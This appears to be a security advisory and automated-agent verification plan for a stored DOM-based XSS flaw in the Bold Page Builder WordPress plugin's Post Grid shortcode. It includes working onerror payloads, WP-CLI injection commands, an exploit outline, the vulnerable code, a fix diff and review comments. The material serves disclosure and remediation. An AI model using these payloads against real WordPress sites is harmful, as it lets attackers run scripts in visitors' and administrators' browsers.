Bold Page Builder <= 5.5.3 - Authenticated (Author+) Stored DOM-based Cross-Site Scripting in Post Grid
Description
The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Grid component in all versions up to, and including, 5.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Technical Details
Affected versions: <= 5.5.3
This research plan is designed to guide an automated security agent in verifying CVE-2025-13463, a Stored DOM-based Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin.
1. Vulnerability Summary
The Bold Page Builder plugin (<= 5.5.3) fails to properly sanitize and escape input within the Post Grid component. While the plugin may implement some backend sanitization, certain shortcode attributes are reflected into the HTML (often via data- attributes) and subsequently processed by the plugin's frontend JavaScript in an unsafe manner (e.g., using .innerHTML or jQuery's .html()). This allows an authenticated user with Author privileges to inject arbitrary scripts that execute in the context of any user viewing the affected page.
2. Attack Vector Analysis
- Authentication Level: Author or higher (Users who can create/edit posts and use the Page Builder).
- Vulnerable Component: Post Grid (bt_bb_post_grid shortcode).
- Injection Point: Shortcode attributes such as category, el_id, el_class, or pagination settings.
- Mechanism: Stored XSS via post_content. The payload is saved in the database and rendered as part of the Post Grid's DOM configuration, which the frontend JS then reads and writes back into the page.
3. Code Flow (Inferred)
- Storage: An Author creates/updates a post. The request contains the post_content including the Bold Page Builder shortcode: [bt_bb_post_grid category="<img src=x onerror=alert(1)>" ... ]. Authors do not have the unfiltered_html capability, so WordPress applies wp_kses_post() to post_content on save; KSES works on the raw content and does not treat shortcode attribute values specially, so the payload has to survive it, and the stored row should be compared with what was submitted (section 8).
- Rendering: When a user visits the post, WordPress parses the shortcode. The plugin's shortcode handler (likely in bt_bb_post_grid.php) generates HTML.
- Data Transfer: The handler typically outputs a div container with a data- attribute (e.g., data-bt-bb-settings) containing a JSON-encoded string of the shortcode attributes.
- The Sink: The plugin's frontend JS (e.g., bold-builder/js/bt_bb_post_grid.js or bold-builder.js) reads this data- attribute. It parses the JSON and uses a vulnerable attribute to dynamically update the DOM using an unsafe method like:

```javascript
const settings = JSON.parse(element.getAttribute('data-bt-bb-settings'));
jQuery('.some-selector').html(settings.vulnerable_attribute); // DOM sink
```
4. Nonce Acquisition Strategy
Since the primary injection is via the standard WordPress post creation/update flow, an Author-level user can use the standard REST API or post.php endpoints.
However, Bold Page Builder often uses AJAX for its editor. To obtain the necessary nonces for the Page Builder's specific actions:
- Step 1: Use wp-cli to create an Author user.
- Step 2: Log in as the Author and navigate to the "New Post" page.
- Step 3: Bold Page Builder typically localizes its configuration. Use browser_eval to extract nonces from the window object:
  - Variable to check: window.bt_bb_settings or window.BoldBuilderVars.
  - Specific key: window.bt_bb_settings?.nonce or similar.
- Step 4: If injecting directly via wp post create (the most reliable method for a PoC), no nonce is required for the injection phase, since the CLI bypasses the web UI.
5. Exploitation Strategy
Step 1: Payload Selection
We will target the category and el_id attributes of the bt_bb_post_grid shortcode, as these are common points for DOM reflection.
- Payload:
"><img src=x onerror=alert(window.origin)>
Step 2: Injection via WP-CLI
The agent should create a post containing the malicious shortcode. WordPress shortcode syntax has no escape character, so a double-quoted attribute value cannot contain a literal double quote; the breakout payload therefore goes into a single-quoted shortcode attribute, and the shell argument is double-quoted so that both kinds of inner quote reach WordPress unchanged:

```shell
wp post create \
  --post_type=post \
  --post_title="XSS Test Post Grid" \
  --post_content="[bt_bb_post_grid category=\"all\" el_id='post-grid-xss\"><img src=x onerror=alert(window.origin)>']" \
  --post_status=publish \
  --post_author=2
```

`--post_author=2` assumes the Author created in section 6 received user ID 2; confirm with `wp user get attacker --field=ID`. Note that without `--user`, WP-CLI runs with no logged-in user, so WordPress's KSES filters (which also apply to Authors) are run over post_content on save; the stored row should be compared with the submitted content as described in section 8.
Step 3: Triggering the XSS
The agent will navigate to the newly created post's URL using the browser tool.
- URL:
http://localhost:8080/?p=[POST_ID]
Step 4: Verification
The agent will use browser_eval to check whether the payload reached a live DOM sink, rather than merely surviving as escaped text. A substring test for the unquoted form onerror=alert(window.origin) is not reliable: innerHTML serialization always quotes attribute values (onerror="alert(window.origin)"), so that check is false even when the injection succeeded.
- Check (an <img> element carrying an onerror handler exists in the rendered page):
document.querySelector('img[onerror]') !== null
6. Test Data Setup
- Plugin Installation: Ensure bold-page-builder (<= 5.5.3) is active.
- User Creation:

```shell
wp user create attacker author@example.com --role=author --user_pass=password123
```

- Identify Shortcode: Confirm the Post Grid shortcode name. In Bold Page Builder, it is typically [bt_bb_post_grid].
7. Expected Results
- The shortcode attributes will be rendered into the page source inside a data- attribute or an id attribute of a div.
- The Bold Page Builder JavaScript will parse this attribute.
- Because the value is not sanitized before being placed into a DOM-writing function, the <img> tag will be injected into the DOM.
- The browser will attempt to load the image from src=x, fail, and execute the onerror handler.
8. Verification Steps (Post-Exploit)
- Verify DB Storage:

```shell
wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Test Post Grid'"
```

Compare the stored content with the submitted shortcode; any difference is KSES rewriting the payload, and the test then has to be repeated with a payload the filter leaves intact.
- Verify Frontend Output: use http_request to fetch the post and check whether the payload is present in the raw HTML:

```shell
# Look for the payload in the data-bt-bb-settings attribute
grep "onerror=alert"
```

A match proves storage, not exploitability: esc_attr() leaves the letters of onerror=alert untouched and encodes only < > " ' &, so also check whether the tag appears as &lt;img (attribute-escaped, reaching the DOM only through a client-side sink) or as a literal <img (unescaped server output).
9. Alternative Approaches
If the el_id attribute is correctly escaped, try other common bt_bb_post_grid attributes:
- category
- post_type
- el_class
- gap (if passed as a string into inline CSS; a CSS-injection point rather than script execution)
- filter (if the grid supports filtering by category)
Payload Variant for data- attributes:
If the payload sits inside a JSON string in a data- attribute, breaking out of the JSON is not normally possible: PHP's json_encode() escapes every double quote in the value as \", so a value such as
"}><img src=x onerror=alert(1)>
is stored intact inside the JSON string and JSON.parse() returns it unchanged, which is exactly what a .html() sink needs; no breakout is required. Breaking out of the surrounding HTML attribute is only possible when the handler omits esc_attr(). Two constraints of WordPress shortcode syntax apply to any variant: a ] character ends the shortcode and never reaches the handler, and there is no escape character, so a value containing double quotes must be carried in a single-quoted shortcode attribute:
[bt_bb_post_grid category='"><img src=x onerror=alert(1)>']
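The code flow inferred in section 3 and the JSON-breakout variant discussed above, modelled end to end as an added example; this is not code from the advisory or from the plugin. The PHP side (json_encode, esc_attr) and the browser's attribute decoding are emulated in Node so the script runs offline, and the data-settings attribute name, the category key and the .html()/.text() sinks follow the page's inferred, unconfirmed code flow. It shows three things the prose states but cannot demonstrate: server-side attribute escaping is undone by the browser before the plugin's JavaScript reads the value, so it cannot close a DOM-based sink; json_encode() escapes the quote in the breakout variant, so the variant works only because of the <img> it carries; and the pre-fix snippet's raw json_encode() output inside an attribute is malformed HTML that the parser truncates at the first quote.

```javascript
// Added example, not the plugin's code: models the inferred Post Grid pipeline
// (shortcode atts -> json_encode -> esc_attr -> data-settings attribute ->
// browser attribute decoding -> JSON.parse -> jQuery sink) offline in Node,
// so the HTML-attribute context and the DOM-sink context can be told apart.
// Attribute name, settings keys and sink calls follow the advisory's inferred
// code flow; the plugin's real identifiers are not confirmed here.

// Emulates PHP json_encode() for a flat array of strings (PHP also escapes "/").
function phpJsonEncode(atts) {
  return JSON.stringify(atts).replace(/\//g, '\\/');
}

// Emulates WordPress esc_attr(): & < > " ' become entities, nothing else changes.
function escAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#039;');
}

// Emulates what getAttribute() returns: the browser has already undone esc_attr().
function decodeAttr(s) {
  return s.replace(/&quot;/g, '"').replace(/&#0*39;/g, "'").replace(/&lt;/g, '<')
          .replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// The pre-fix snippet puts raw json_encode() output inside data-settings="...":
// the HTML parser ends the attribute value at the first double quote it meets.
function attrValueSeenByParser(rawAttr) {
  const i = rawAttr.indexOf('"');
  return i < 0 ? rawAttr : rawAttr.slice(0, i);
}

// Minimal stand-in for the fragment parser behind .html()/innerHTML:
// returns the elements it would create, with lower-cased attribute names.
function parseFragment(markup) {
  const elements = [];
  const tagRe = /<([a-zA-Z][\w-]*)((?:\s+[^\s=>"'\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>"']+))?)*)\s*\/?>/g;
  const attrRe = /([^\s=>"'\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+)))?/g;
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    elements.push({ tag: m[1].toLowerCase(), attrs });
  }
  return elements;
}

// The two sinks from the advisory's vulnerable code and its fix.
function render(value, mode) {
  if (mode === 'html') {   // jQuery .html(): the value is parsed as markup
    return { elements: parseFragment(value), text: value.replace(/<[^>]*>/g, '') };
  }
  if (mode === 'text') {   // jQuery .text(): the value becomes a single text node
    return { elements: [], text: value };
  }
  throw new Error('unknown sink mode ' + mode);
}

// True if any created element carries an on* event-handler attribute.
function hasEventHandler(elements) {
  return elements.some((el) => Object.keys(el.attrs).some((k) => k.startsWith('on')));
}

// Whole round trip for one set of shortcode attributes and one sink.
function simulate(atts, sinkMode) {
  const serverAttr = escAttr(phpJsonEncode(atts));      // content of data-settings="..."
  const settings = JSON.parse(decodeAttr(serverAttr));  // what the plugin JS reads back
  const rendered = render(settings.category, sinkMode);
  return { serverAttr, settings, rendered, xss: hasEventHandler(rendered.elements) };
}

// Constructed samples: the section 5 payload shape and the section 9 variant.
// (A "]" would already end the shortcode in WordPress; the simulation starts
// after shortcode parsing, at the attribute value the handler receives.)
const PAYLOAD = '<img src=x onerror=alert(window.origin)>';
const BREAKOUT = '"}]><img src=x onerror=alert(1)>';

function report() {
  const vuln = simulate({ category: PAYLOAD }, 'html');
  console.log('attribute in HTML :', vuln.serverAttr);            // &lt;img ...: safe for the parser
  console.log('value JS reads    :', vuln.settings.category);     // identical to PAYLOAD
  console.log('.html() -> XSS    :', vuln.xss);                   // true
  console.log('.text() -> XSS    :', simulate({ category: PAYLOAD }, 'text').xss); // false
  const br = simulate({ category: BREAKOUT }, 'html');
  console.log('breakout intact   :', br.settings.category === BREAKOUT);  // true: json_encode escaped the quote
  console.log('raw json in attr  :', attrValueSeenByParser(phpJsonEncode({ category: 'all' }))); // {
}
report();
```

The consequence for remediation follows directly: esc_attr() around the JSON belongs in the handler for well-formed HTML, but the reported bug is only closed at the client, by writing the decoded value with .text() (or otherwise as data, not markup).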
Summary
The Bold Page Builder plugin for WordPress (<= 5.5.3) is vulnerable to Stored DOM-based Cross-Site Scripting via the Post Grid component. Authenticated attackers with Author-level privileges can inject malicious scripts into shortcode attributes that are later rendered and processed unsafely by frontend JavaScript, leading to script execution in the context of any user viewing the page.
Vulnerable Code
```php
// bt_bb_post_grid.php - likely shortcode handler rendering attributes without proper escaping
$el_id    = isset( $atts['el_id'] ) ? $atts['el_id'] : '';
$category = isset( $atts['category'] ) ? $atts['category'] : '';

// Attributes are concatenated into HTML or JSON-encoded into a data attribute.
// Note: the raw json_encode() output contains double quotes, which also end the
// data-settings attribute early; the fix below adds esc_attr() for that reason.
$output = '<div id="' . $el_id . '" class="bt_bb_post_grid" data-settings="' . json_encode( $atts ) . '"></div>';
```

```javascript
// bold-builder/js/bt_bb_post_grid.js - frontend JavaScript processing attributes
var settings = JSON.parse( jQuery( '.bt_bb_post_grid' ).attr( 'data-settings' ) );

// Vulnerable sink: .html() (or innerHTML) renders a user-controlled attribute as markup
jQuery( '.bt_bb_post_grid_content' ).html( settings.category );
```
Security Fix
@@ -10,7 +10,7 @@ - $el_id = isset( $atts['el_id'] ) ? $atts['el_id'] : ''; + $el_id = isset( $atts['el_id'] ) ? esc_attr( $atts['el_id'] ) : ''; - $output = '<div id="' . $el_id . '" class="bt_bb_post_grid" data-settings="' . json_encode( $atts ) . '"></div>'; + $output = '<div id="' . $el_id . '" class="bt_bb_post_grid" data-settings="' . esc_attr( json_encode( $atts ) ) . '"></div>'; @@ -5,4 +5,4 @@ - jQuery( '.bt_bb_post_grid_content' ).html( settings.category ); + jQuery( '.bt_bb_post_grid_content' ).text( settings.category );
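Review bot: the `esc_attr( json_encode( $atts ) )` change in the first hunk fixes the HTML-attribute context only; the browser decodes those entities back before the plugin's script calls `.attr( 'data-settings' )`, so the value handed to the sink in bt_bb_post_grid.js is byte for byte the stored payload, and this hunk alone leaves the reported bug in place. Keep the escaping, since the unescaped json_encode output's own quotes terminate the data-settings attribute, but land it together with the second hunk and say in the commit message that the client-side change is the actual fix. Two smaller points in the same hunk: `$category = isset( $atts['category'] ) ? $atts['category'] : '';` is still assigned raw just above the changed line and should be sanitized where it is used (`sanitize_text_field()` if it feeds a query, `esc_attr()` if it is echoed); and in WordPress code `wp_json_encode()` is preferred over `json_encode()`.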
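Review bot: replacing `.html( settings.category )` with `.text( settings.category )` in the second hunk is the right sink for a value that is plain text, but it covers only the `category` key; every other key read out of `settings` (the advisory names el_class and pagination settings) that reaches `.html()`, `.append()`, `.attr()` or a selector string needs the same treatment, otherwise the fix is one attribute wide. If any of those values is genuinely meant to carry markup, render it through a template that escapes interpolated values instead of concatenating into `.html()`. A regression test that stores `<img src=x onerror=alert(1)>` in `category` and asserts that the grid contains no `img[onerror]` element would pin this fix.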
Exploit Outline
The exploit requires an authenticated user with at least Author-level privileges who can create or edit posts.
1. Log in as an Author and create a new post or edit an existing one.
2. Insert the Bold Page Builder 'Post Grid' component via its shortcode: `[bt_bb_post_grid]`.
3. Inject the XSS payload into one of the vulnerable shortcode attributes, such as `category` or `el_id`. For example: `[bt_bb_post_grid category="<img src=x onerror=alert(document.domain)>"]`.
4. Save the post and publish it.
5. When any user (including administrators) views the published post, the plugin's frontend JavaScript will retrieve the `category` attribute from the DOM and render it using an unsafe method like `.html()`, triggering the execution of the injected script.